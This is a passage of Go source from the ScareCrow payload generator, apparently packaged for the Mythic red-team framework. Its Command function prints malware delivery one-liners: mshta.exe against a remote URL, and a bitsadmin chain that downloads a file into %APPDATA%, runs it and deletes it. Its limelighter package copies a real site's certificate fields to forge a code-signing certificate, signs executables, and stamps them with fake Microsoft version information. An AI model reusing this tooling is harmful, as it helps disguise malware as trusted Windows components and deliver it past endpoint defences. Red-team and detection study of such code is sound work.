	finalstring := strings.Join(B64payload, "")
	return finalstring
}
68 |
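// Unzip extracts the archive at src into dest and returns the paths written
// (directories included, in archive order). Extraction stops at the first
// error; the paths handled so far are returned together with it.
//
// Every entry name is joined onto dest and rejected unless the result stays
// inside dest — the "zip slip" guard against names such as "../../x". Entries
// are written with the mode recorded in the archive. Symbolic-link entries
// get no special treatment. Compared with the original, a failure to create
// a directory entry is now reported instead of silently ignored.
func Unzip(src string, dest string) ([]string, error) {
	var filenames []string
	r, err := zip.OpenReader(src)
	if err != nil {
		return filenames, err
	}
	defer r.Close()
	// Everything must resolve beneath this prefix.
	root := filepath.Clean(dest) + string(os.PathSeparator)
	for _, f := range r.File {
		fpath := filepath.Join(dest, f.Name)
		if !strings.HasPrefix(fpath, root) {
			return filenames, fmt.Errorf("%s: illegal file path", fpath)
		}
		filenames = append(filenames, fpath)
		if f.FileInfo().IsDir() {
			if err := os.MkdirAll(fpath, os.ModePerm); err != nil {
				return filenames, err
			}
			continue
		}
		if err := os.MkdirAll(filepath.Dir(fpath), os.ModePerm); err != nil {
			return filenames, err
		}
		if err := extractZipFile(f, fpath); err != nil {
			return filenames, err
		}
	}
	return filenames, nil
}

// extractZipFile copies one archive member to fpath using the member's mode.
func extractZipFile(f *zip.File, fpath string) error {
	outFile, err := os.OpenFile(fpath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())
	if err != nil {
		return err
	}
	defer outFile.Close()
	rc, err := f.Open()
	if err != nil {
		return err
	}
	defer rc.Close()
	_, err = io.Copy(outFile, rc)
	return err
}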
107 |
// B64decode decodes the package-level base64string blob and writes it to a
// newly created file called name, syncing it to disk before returning.
// Any failure — decode, create, write or sync — panics.
func B64decode(name string) {
	must := func(err error) {
		if err != nil {
			panic(err)
		}
	}
	dec, err := base64.StdEncoding.DecodeString(base64string)
	must(err)
	f, err := os.Create(name)
	must(err)
	defer f.Close()
	_, err = f.Write(dec)
	must(err)
	must(f.Sync())
}
125 |
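// Zipit writes a zip archive of source (a single file or a directory tree)
// to target.
//
// When source is a directory, every entry is stored under a top-level folder
// named after the directory's base name (the directory itself becomes
// "<base>/"); a single file is stored under its own name. Directory entries
// get a trailing "/" and are stored uncompressed, files are deflated.
//
// Returns the first error from creating target, stat'ing source, walking the
// tree, writing an entry, or closing the archive. The original returned nil
// when source did not exist (leaving an empty archive behind) and discarded
// the walk error; both are now reported.
func Zipit(source, target string) error {
	zipfile, err := os.Create(target)
	if err != nil {
		return err
	}
	defer zipfile.Close()
	archive := zip.NewWriter(zipfile)
	info, err := os.Stat(source)
	if err != nil {
		archive.Close()
		return err
	}
	var baseDir string
	if info.IsDir() {
		baseDir = filepath.Base(source)
	}
	walkErr := filepath.Walk(source, func(path string, info os.FileInfo, err error) error {
		if err != nil {
			return err
		}
		return addZipEntry(archive, baseDir, source, path, info)
	})
	// Close flushes the central directory; its error matters when the walk
	// itself succeeded.
	if closeErr := archive.Close(); walkErr == nil {
		walkErr = closeErr
	}
	return walkErr
}

// addZipEntry stores one walked path (file or directory) in archive. baseDir
// is the top-level folder name ("" when source is a single file).
func addZipEntry(archive *zip.Writer, baseDir, source, path string, info os.FileInfo) error {
	header, err := zip.FileInfoHeader(info)
	if err != nil {
		return err
	}
	if baseDir != "" {
		header.Name = filepath.Join(baseDir, strings.TrimPrefix(path, source))
	}
	if info.IsDir() {
		header.Name += "/"
	} else {
		header.Method = zip.Deflate
	}
	writer, err := archive.CreateHeader(header)
	if err != nil {
		return err
	}
	if info.IsDir() {
		return nil
	}
	file, err := os.Open(path)
	if err != nil {
		return err
	}
	defer file.Close()
	_, err = io.Copy(writer, file)
	return err
}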
176 |
// Command prints the delivery instructions matching CommandLoader and returns
// URL — normalised to end in "/" only in the macro branch; every other branch
// returns it untouched. All output goes to stdout.
//
// Branches (they are independent ifs, so more than one can print):
//   - "hta" with a URL: prints an mshta.exe command line for URL/outFile.
//   - no URL and outFile contains neither ".js" nor ".hta": prints a
//     cscript //E:jscript invocation for running the file locally.
//   - "macro" with a URL: appends "/" if missing and prints two banner
//     lines; the macro body itself is presumably emitted elsewhere.
//   - "bits" with a URL: prints a bitsadmin /transfer one-liner that
//     downloads outFile into %APPDATA%, runs it (through cscript when the
//     name contains none of ".js", ".hta", ".cpl", ".exe"; directly
//     otherwise), waits 20 seconds and deletes it.
//
// The extension checks use strings.Contains, so they match anywhere in the
// name rather than only at its end. From a detection standpoint each printed
// line is also the process command line the delivery leaves on the endpoint:
// bitsadmin /transfer, mshta.exe with a remote URL, and cscript //E:jscript
// are the telemetry to alert on.
func Command(URL string, CommandLoader string, outFile string) string {

	if URL != "" && CommandLoader == "hta" {
		fmt.Println("[*] HTA Payload")
		fmt.Println("[!] Can be executed manually by a user or embeded into a one liner command that executes it:")
		if strings.HasSuffix(URL, "/") {
			fmt.Println("mshta.exe " + URL + outFile)
		} else {
			fmt.Println("mshta.exe " + URL + "/" + outFile)
		}
	}
	if URL == "" && !strings.Contains(outFile, ".js") && !strings.Contains(outFile, ".hta") {
		fmt.Println(color.GreenString("[+] ") + "Non Executable file extension detected. Either add the extension \".js\" or use the following to execute it (note that this works from a local instance, webdav or fileshare... not a webserver):")
		fmt.Println("cscript //E:jscript " + outFile + "")
	}
	if URL != "" && CommandLoader == "macro" {
		// Only this branch rewrites the returned URL.
		if strings.HasSuffix(URL, "/") {
		} else {
			URL = URL + "/"
		}
		fmt.Println("[*] Macro Delivery Payload")
		fmt.Println("[!] Excel macro that will download, execute and remove the payload:")
	}

	if URL != "" && CommandLoader == "bits" {
		fmt.Println("[*] Bitsadmin")
		fmt.Println("[!] One liner command to execute it:")
		if !strings.Contains(outFile, ".js") && !strings.Contains(outFile, ".hta") && !strings.Contains(outFile, ".cpl") && !strings.Contains(outFile, ".exe") {
			if strings.HasSuffix(URL, "/") {
				fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
			} else {
				fmt.Println("bitsadmin /transfer " + outFile + " " + URL + "/" + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
			}
		} else {
			if strings.HasSuffix(URL, "/") {
				fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
			} else {
				fmt.Println("bitsadmin /transfer " + outFile + " " + URL + "/" + outFile + " %APPDATA%\\" + outFile + " & %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")

			}
		}
	}
	return URL
}
221 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/go.mod:
--------------------------------------------------------------------------------
1 | module ScareCrow
2 |
3 | go 1.14
4 |
5 | require (
6 | github.com/akavel/rsrc v0.9.0 // indirect
7 | github.com/fatih/color v1.9.0
8 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca
9 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 // indirect
10 | golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c
11 | )
12 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/go.sum:
--------------------------------------------------------------------------------
1 | github.com/akavel/rsrc v0.9.0 h1:HwUDC0+tMFWqN4D5G+o5siGD4oVsC3jn6zM8ocjc3nY=
2 | github.com/akavel/rsrc v0.9.0/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c=
3 | github.com/fatih/color v1.9.0 h1:8xPHl4/q1VyqGIPif1F+1V3Y3lSmrq01EabUW3CoW5s=
4 | github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU=
5 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
6 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca h1:ozPUX9TKQZVek4lZWYRsQo7uS8vJ+q4OOHvRhHiCLfU=
7 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca/go.mod h1:eJTEwMjXb7kZ633hO3Ln9mBUCOjX2+FlTljvpl9SYdE=
8 | github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=
9 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
10 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
11 | github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA=
12 | github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
13 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
14 | github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM=
15 | github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE=
16 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 h1:+n/aFZefKZp7spd8DFdX7uMikMLXX4oubIzJF4kv/wI=
17 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3/go.mod h1:RagcQ7I8IeTMnF8JTXieKnO4Z6JCsikNEzj0DwauVzE=
18 | github.com/rogpeppe/go-internal v1.7.1-0.20210131190821-dc4b49510d96/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc=
19 | github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
20 | github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae h1:LLvf5CCPekfeUlqQDGfVvds1kMf4hBfcAkpzYHqjYV4=
21 | github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae/go.mod h1:oWzR58pjEbqmQK35Wh+slsMO3H4Chi/24zVIyqJfWNI=
22 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
23 | golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
24 | golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
25 | golang.org/x/mod v0.4.1 h1:Kvvh58BN8Y9/lBi7hTekvtMpm07eUZ0ck5pRHpsMWrY=
26 | golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
27 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
28 | golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
29 | golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
30 | golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
31 | golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
32 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
33 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
34 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
35 | golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
36 | golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae h1:Ih9Yo4hSPImZOpfGuA4bR/ORKTAbhZo2AbWNRCnevdo=
37 | golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
38 | golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
39 | golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
40 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
41 | golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
42 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
43 | golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
44 | golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9 h1:lQ9QDTM4SHDP/S/bmj2wjNMQ93AvRYf7kuoqr2MDxmc=
45 | golang.org/x/tools v0.1.1-0.20210304221016-50ca8d007de9/go.mod h1:9bzcO0MWcOuT0tm1iBGzDVPshzfwoVvREIui8C+MHqU=
46 | golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
47 | golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
48 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
49 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE=
50 | golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
51 | gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
52 | gopkg.in/errgo.v2 v2.1.0/go.mod h1:hNsd1EY+bozCKY1Ytp96fpM3vjJbqLJn88ws8XvfDNI=
53 | mvdan.cc/garble v0.2.0 h1:EcSXSbx2ocE42m1tpbSPh0MBu6uYewWj82qyWfXjr7s=
54 | mvdan.cc/garble v0.2.0/go.mod h1:9htOtPZGNFoUyS7Y/R/T7vfnEi386kmsOAhNEoc24ts=
55 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/limelighter/limelighter.go:
--------------------------------------------------------------------------------
1 | package limelighter
2 |
3 | import (
4 | "bytes"
5 | "crypto/rand"
6 | "crypto/rsa"
7 | "crypto/tls"
8 | "crypto/x509"
9 | "crypto/x509/pkix"
10 | "encoding/pem"
11 | "fmt"
12 | "io"
13 | "io/ioutil"
14 | "log"
15 | crand "math/rand"
16 | "os"
17 | "os/exec"
18 | "strings"
19 | "time"
20 |
21 | "github.com/josephspurrier/goversioninfo"
22 | )
23 |
// letters is the alphabet RandStringBytes draws from: ASCII letters and digits.
const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
25 |
// VarNumberLength returns a random alphanumeric string whose length is drawn
// uniformly from [min, max). The generator is math/rand (imported as crand),
// reseeded from the wall clock on every call — not cryptographic randomness.
// crand.Intn panics when max-min is not positive, so max must exceed min.
func VarNumberLength(min, max int) string {
	crand.Seed(time.Now().UnixNano())
	length := min + crand.Intn(max-min)
	return RandStringBytes(length)
}
// RandStringBytes returns n characters chosen independently and uniformly
// from letters, using math/rand (imported as crand) rather than crypto/rand.
func RandStringBytes(n int) string {
	out := make([]byte, 0, n)
	for len(out) < n {
		out = append(out, letters[crand.Intn(len(letters))])
	}
	return string(out)
}
42 |
// GenerateCert writes the key pair and certificate that the signing step
// uses: <domain>.key (a 4096-bit RSA key in PKCS#8) and <domain>.pem.
//
// The certificate is modelled on the leaf certificate served at domain:443,
// fetched with GetCertificatesPEM: its serial number, subject common name,
// issuer common name and validity window are copied into the new
// certificate. Everything else is local — the certificate is signed with the
// freshly generated rootKey, not by the real issuer, so its signature cannot
// be verified against any certificate in a trust store; only the fields a
// viewer displays resemble the genuine one, and a proper chain validation of
// anything signed with it fails. The template also sets IsCA, the
// DigitalSignature|CertSign key usages and the ServerAuth/ClientAuth extended
// key usages (no code-signing EKU is requested).
//
// If the TLS connection to domain:443 fails the function changes to the
// parent directory, removes the working folder named after inputFile (the
// part before its first "."), and terminates with log.Fatal. The results of
// pem.Decode and x509.ParseCertificate are used without an error check.
func GenerateCert(domain string, inputFile string) {
	var err error
	rootKey, err := rsa.GenerateKey(rand.Reader, 4096)
	if err != nil {
		panic(err)
	}
	certs, err := GetCertificatesPEM(domain + ":443")
	if err != nil {
		// Clean up the generated project folder before aborting.
		os.Chdir("..")
		foldername := strings.Split(inputFile, ".")
		os.RemoveAll(foldername[0])
		log.Fatal("Error: The domain: " + domain + " does not exist or is not accessible from the host you are compiling on")
	}
	// First PEM block of the served chain (expected to be the leaf).
	block, _ := pem.Decode([]byte(certs))
	cert, _ := x509.ParseCertificate(block.Bytes)

	keyToFile(domain+".key", rootKey)

	// Subject side copies the observed leaf's identifying fields.
	SubjectTemplate := x509.Certificate{
		SerialNumber: cert.SerialNumber,
		Subject: pkix.Name{
			CommonName: cert.Subject.CommonName,
		},
		NotBefore:             cert.NotBefore,
		NotAfter:              cert.NotAfter,
		BasicConstraintsValid: true,
		IsCA:                  true,
		KeyUsage:              x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign,
		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth, x509.ExtKeyUsageClientAuth},
	}
	// Issuer side only carries the observed issuer's name; the signing key
	// below is rootKey, so this is not the real issuer.
	IssuerTemplate := x509.Certificate{
		SerialNumber: cert.SerialNumber,
		Subject: pkix.Name{
			CommonName: cert.Issuer.CommonName,
		},
		NotBefore: cert.NotBefore,
		NotAfter:  cert.NotAfter,
	}
	derBytes, err := x509.CreateCertificate(rand.Reader, &SubjectTemplate, &IssuerTemplate, &rootKey.PublicKey, rootKey)
	if err != nil {
		panic(err)
	}
	certToFile(domain+".pem", derBytes)

}
88 |
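// keyToFile writes key to filename as a PEM-encoded PKCS#8 private key.
//
// Two deliberate differences from the earlier version:
//   - the file is opened with mode 0600 and chmod'ed to 0600 if it already
//     existed, so the code-signing key is not left world-readable on the
//     build host (os.Create used 0666 minus umask);
//   - the PEM label is "PRIVATE KEY", the label defined for PKCS#8. The old
//     "RSA PRIVATE KEY" label denotes PKCS#1 and only loaded because OpenSSL
//     falls back to PKCS#8 parsing; `openssl pkcs12 -inkey` accepts both.
//
// Error handling is unchanged in kind: a marshalling failure prints to stderr
// and exits with status 2, any file error panics. Marshalling now happens
// before the file is created so a failure leaves no empty key file behind.
func keyToFile(filename string, key *rsa.PrivateKey) {
	der, err := x509.MarshalPKCS8PrivateKey(key)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Unable to marshal RSA private key: %v", err)
		os.Exit(2)
	}
	file, err := os.OpenFile(filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
	if err != nil {
		panic(err)
	}
	defer file.Close()
	// OpenFile's mode only applies to newly created files; enforce it for a
	// pre-existing one as well. Best effort: not every filesystem supports it.
	if err := file.Chmod(0600); err != nil {
		log.Printf("[!] Could not restrict permissions on %s: %v", filename, err)
	}
	if err := pem.Encode(file, &pem.Block{Type: "PRIVATE KEY", Bytes: der}); err != nil {
		panic(err)
	}
	if err := file.Close(); err != nil {
		panic(err)
	}
}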
104 |
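// certToFile writes derBytes to filename as a single PEM "CERTIFICATE" block.
//
// Any failure is fatal (log.Fatalf), as elsewhere in this package. The error
// messages now name the file actually being written; the previous ones
// hard-coded "cert.pem" regardless of filename, which misled users who saw
// the message while <domain>.pem was the file that failed.
func certToFile(filename string, derBytes []byte) {
	certOut, err := os.Create(filename)
	if err != nil {
		log.Fatalf("[-] Failed to Open %s for Writing: %s", filename, err)
	}
	if err := pem.Encode(certOut, &pem.Block{Type: "CERTIFICATE", Bytes: derBytes}); err != nil {
		certOut.Close()
		log.Fatalf("[-] Failed to Write Data to %s: %s", filename, err)
	}
	if err := certOut.Close(); err != nil {
		log.Fatalf("[-] Error Closing %s: %s", filename, err)
	}
}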
117 |
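// GetCertificatesPEM performs a TLS handshake with address (host:port) and
// returns the certificate chain the peer presented, leaf first, as
// concatenated PEM "CERTIFICATE" blocks.
//
// Certificate verification is disabled on purpose: the goal is to copy
// whatever the server presents, not to trust it, and no application data is
// exchanged beyond the handshake (tls.Dial derives the SNI name from the host
// part of address). Do not reuse this helper for a connection that carries
// data.
//
// Dial and handshake are bounded by a 15-second timeout so an unreachable or
// black-holed host fails the build instead of hanging it forever, and an
// empty chain is reported as an error rather than an empty string so that
// callers cannot end up decoding nothing.
func GetCertificatesPEM(address string) (string, error) {
	dialer := &net.Dialer{Timeout: 15 * time.Second}
	conn, err := tls.DialWithDialer(dialer, "tcp", address, &tls.Config{
		InsecureSkipVerify: true, // intentional: we clone, we do not trust
	})
	if err != nil {
		return "", err
	}
	defer conn.Close()

	peerCerts := conn.ConnectionState().PeerCertificates
	if len(peerCerts) == 0 {
		return "", fmt.Errorf("no certificate presented by %s", address)
	}
	var buf bytes.Buffer
	for _, cert := range peerCerts {
		if err := pem.Encode(&buf, &pem.Block{Type: "CERTIFICATE", Bytes: cert.Raw}); err != nil {
			return "", err
		}
	}
	return buf.String(), nil
}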
138 |
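// GeneratePFK bundles <domain>.key and <domain>.pem into the PKCS#12 file
// <domain>.pfx protected by password, by running `openssl pkcs12 -export`.
//
// The password reaches openssl through an environment variable
// (-passin/-passout env:LIMELIGHTER_PASS) instead of `pass:<password>` on
// the command line, where it was readable by every local user through ps
// or /proc/*/cmdline for the lifetime of the process. openssl's stderr is
// appended to the fatal error so a failure can be diagnosed.
//
// exec.Command does not go through a shell, so domain and password cannot
// inject further commands; a domain beginning with '-' could still be
// mis-parsed by openssl as an option, which the caller should avoid.
func GeneratePFK(password string, domain string) {
	const passVar = "LIMELIGHTER_PASS"
	cmd := exec.Command("openssl", "pkcs12", "-export",
		"-out", domain+".pfx",
		"-inkey", domain+".key",
		"-in", domain+".pem",
		"-passin", "env:"+passVar,
		"-passout", "env:"+passVar)
	cmd.Env = append(os.Environ(), passVar+"="+password)
	var stderr bytes.Buffer
	cmd.Stderr = &stderr
	if err := cmd.Run(); err != nil {
		log.Fatalf("cmd.Run() failed with %s\n%s", err, stderr.String())
	}
}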
146 |
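// SignExecutable Authenticode-signs filein with the PKCS#12 bundle pfx and
// writes the signed binary to fileout using osslsigncode.
//
// The PKCS#12 password is passed with -readpass from a temporary file that
// ioutil.TempFile creates with mode 0600 and that is removed afterwards,
// instead of `-pass <password>` on the command line (visible to every local
// user via ps while osslsigncode runs). No timestamp option (-t) is given,
// so the signature is only as long-lived as the certificate's NotAfter, and
// because the certificate from GenerateCert is self-signed, Windows will not
// treat the signer as trusted — the signature is cosmetic, not a trust chain.
func SignExecutable(password string, pfx string, filein string, fileout string) {
	passFile, err := ioutil.TempFile("", "limelighter-pass-")
	if err != nil {
		log.Fatalf("could not create password file: %s\n", err)
	}
	passPath := passFile.Name()
	// log.Fatalf exits without running defers, so remove the file explicitly
	// on every failure path as well.
	if _, err := passFile.WriteString(password); err != nil {
		passFile.Close()
		os.Remove(passPath)
		log.Fatalf("could not write password file: %s\n", err)
	}
	if err := passFile.Close(); err != nil {
		os.Remove(passPath)
		log.Fatalf("could not close password file: %s\n", err)
	}
	defer os.Remove(passPath)

	cmd := exec.Command("osslsigncode", "sign",
		"-pkcs12", pfx,
		"-readpass", passPath,
		"-in", filein,
		"-out", fileout)
	var stderr bytes.Buffer
	cmd.Stderr = &stderr
	if err := cmd.Run(); err != nil {
		os.Remove(passPath)
		log.Fatalf("cmd.Run() failed with %s\n%s", err, stderr.String())
	}
}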
154 |
155 | func FileProperties(name string, configFile string) string {
156 | fmt.Println("[*] Creating an Embedded Resource File")
157 | vi := &goversioninfo.VersionInfo{}
158 | if configFile != "" {
159 | var err error
160 | input := io.ReadCloser(os.Stdin)
161 | if input, err = os.Open("../" + configFile); err != nil {
162 | log.Printf("Cannot open %q: %v", configFile, err)
163 | os.Exit(3)
164 | }
165 | jsonBytes, err := ioutil.ReadAll(input)
166 | input.Close()
167 | if err != nil {
168 | log.Printf("Error reading %q: %v", configFile, err)
169 | os.Exit(3)
170 | }
171 | if err := vi.ParseJSON(jsonBytes); err != nil {
172 | log.Printf("Could not parse the .json file: %v", err)
173 | os.Exit(3)
174 | }
175 | name = vi.StringFileInfo.InternalName
176 | } else if configFile == "" {
177 | if name == "APMon" {
178 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
179 | vi.StringFileInfo.InternalName = "APMon.dll.mui"
180 | vi.StringFileInfo.FileDescription = "Adaptive Port Monitor"
181 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
182 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
183 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\APMon.dll"
184 | vi.FixedFileInfo.ProductVersion.Patch = 18362
185 | vi.FixedFileInfo.ProductVersion.Major = 10
186 | vi.FixedFileInfo.ProductVersion.Minor = 0
187 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
188 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
189 | vi.FixedFileInfo.FileVersion.Major = 1
190 | vi.FixedFileInfo.FileVersion.Minor = 0
191 | vi.FixedFileInfo.FileVersion.Patch = 18362
192 | vi.FixedFileInfo.FileVersion.Build = 1
193 | vi.StringFileInfo.InternalName = "APMon.dll.mui"
194 | }
195 | if name == "bisr" {
196 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
197 | vi.StringFileInfo.InternalName = "bisrv.dll.mui"
198 | vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service"
199 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
200 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
201 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\bisrv.dll"
202 | vi.FixedFileInfo.ProductVersion.Patch = 18362
203 | vi.FixedFileInfo.ProductVersion.Major = 10
204 | vi.FixedFileInfo.ProductVersion.Minor = 0
205 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
206 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
207 | vi.FixedFileInfo.FileVersion.Major = 1
208 | vi.FixedFileInfo.FileVersion.Minor = 0
209 | vi.FixedFileInfo.FileVersion.Patch = 18362
210 | vi.FixedFileInfo.FileVersion.Build = 1
211 | vi.StringFileInfo.InternalName = "bisrv.dll.mui"
212 | }
213 | if name == "btpanui" {
214 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
215 | vi.StringFileInfo.InternalName = "btpanui.dll.mui"
216 | vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface"
217 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
218 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
219 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\btpanui.dll"
220 | vi.FixedFileInfo.ProductVersion.Patch = 18362
221 | vi.FixedFileInfo.ProductVersion.Major = 10
222 | vi.FixedFileInfo.ProductVersion.Minor = 0
223 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
224 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
225 | vi.FixedFileInfo.FileVersion.Major = 1
226 | vi.FixedFileInfo.FileVersion.Minor = 0
227 | vi.FixedFileInfo.FileVersion.Patch = 18362
228 | vi.FixedFileInfo.FileVersion.Build = 1
229 | vi.StringFileInfo.InternalName = "btpanui.dll.mui"
230 | }
231 | if name == "cmdext" {
232 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
233 | vi.StringFileInfo.InternalName = "CmdExt.DLL"
234 | vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL"
235 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
